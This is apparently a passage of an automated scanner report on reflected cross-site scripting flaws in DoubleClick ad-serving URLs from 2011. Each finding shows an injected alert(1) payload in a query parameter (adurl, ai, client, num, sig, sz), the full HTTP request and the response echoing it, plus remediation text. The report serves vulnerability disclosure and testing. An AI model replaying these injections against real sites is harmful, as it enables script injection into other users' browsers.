document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691https://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;40155598"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e8b'-alert(1)-'ba15f59f95e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7481 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:06:29 GMT Expires: Thu, 03 Feb 2011 16:06:29 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95ehttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;39213496\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8ab'-alert(1)-'2e90ecc46ed was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62261"-alert(1)-"0f904a05a8a was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cad'-alert(1)-'9a787db18eb was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:06:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\"> ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97bde"-alert(1)-"10744de2739 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:06:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b11"-alert(1)-"fc5636c00ac was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ccfa'-alert(1)-'eb4e71ababd was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc24d"-alert(1)-"d0287f2bb97 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e728'-alert(1)-'54ab655354d was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17ecf'-alert(1)-'9bd825e5b22 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a70"-alert(1)-"52f10523c4a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
